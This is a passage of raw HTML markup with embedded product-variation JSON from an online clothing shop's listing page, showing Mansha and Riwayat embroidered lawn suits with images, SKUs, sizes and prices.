04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg"},{"attributes":{"attribute_pa_size":"medium"},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"1a-1-700x1050-34.99-600x900_2_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":951,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-01","variation_description":"","variation_id":565,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg"},{"attributes":{"attribute_pa_size":"small"},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"1a-1-700x1050-34.99-600x900_2_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":951,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-01","variation_description":"","variation_id":566,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-601 status-publish instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-2\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-ora-600x900_3_11zon.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-ora-600x900_3_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-ora-600x900_3_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-orr-600x900_5_11zon.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-orr-600x900_5_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/black-orr-600x900_5_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-2\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"601\" data-product_sku=\"MAN-CH1-02\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-2\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-2\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"601\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"black-ora-600x900_3_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":948,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":10,"min_qty":1,"price_html":"","sku":"MAN-CH1-02","variation_description":"","variation_id":604,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-688 status-publish instock product_cat-new-arrivals product_cat-riwayat-chapter-2 product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-2\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mint-grenn-30.99-600x900_4_11zon.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mint-grenn-30.99-600x900_4_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mint-grenn-30.99-600x900_4_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen-30.99-600x900_2_11zon.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen-30.99-600x900_2_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/mintgreen-30.99-600x900_2_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-2\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"688\" data-product_sku=\"RIW-CH2-02\" aria-label=\"Select options for “RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/\" rel=\"tag\">RIWAYAT CHAPTER 2<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-2\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-2\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"688\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":30.99,"display_regular_price":30.99,"image":{"title":"mint-grenn-30.99-600x900_4_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":953,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":11,"min_qty":1,"price_html":"","sku":"RIW-CH2-02","variation_description":"","variation_id":689,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/mint-grenn-30.99-600x900_4_11zon.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-692 status-publish last instock product_cat-new-arrivals product_cat-riwayat-chapter-2 product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-4\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/redblue-600x900_7_11zon.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/redblue-600x900_7_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/redblue-600x900_7_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red-blue-600x900_6_11zon.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red-blue-600x900_6_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/red-blue-600x900_6_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-4\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"692\" data-product_sku=\"RIW-CH2-04\" aria-label=\"Select options for “RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/\" rel=\"tag\">RIWAYAT CHAPTER 2<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-4\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">RIWAYAT DIGITAL EMBROIDERED LUXURY LAWN WITH BAMBER DUPATTA<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-4\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"692\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":32.99,"display_regular_price":32.99,"image":{"title":"redblue-600x900_7_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":945,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":11,"min_qty":1,"price_html":"","sku":"RIW-CH2-04","variation_description":"","variation_id":693,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/redblue-600x900_7_11zon.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-618 status-publish first instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-9\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-34.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-34.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink-34.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink34.99-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink34.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brownpink34.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-9\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"618\" data-product_sku=\"MAN-CH1-09\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-9\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-9\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"618\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"brownpink 34.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":584,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-09","variation_description":"","variation_id":619,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brownpink-34.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-704 status-publish instock product_cat-new-arrivals product_cat-riwayat-chapter-2 product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/riwayat-digital-embroidered-luxury-lawn-with-bamber-dupatta-10\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/VIOLET-32.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/VIOLET-32.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/VIOLET-32.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/VIOLET-32.999-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/VIOLET-32.999-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/VIOLET-32.999-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" 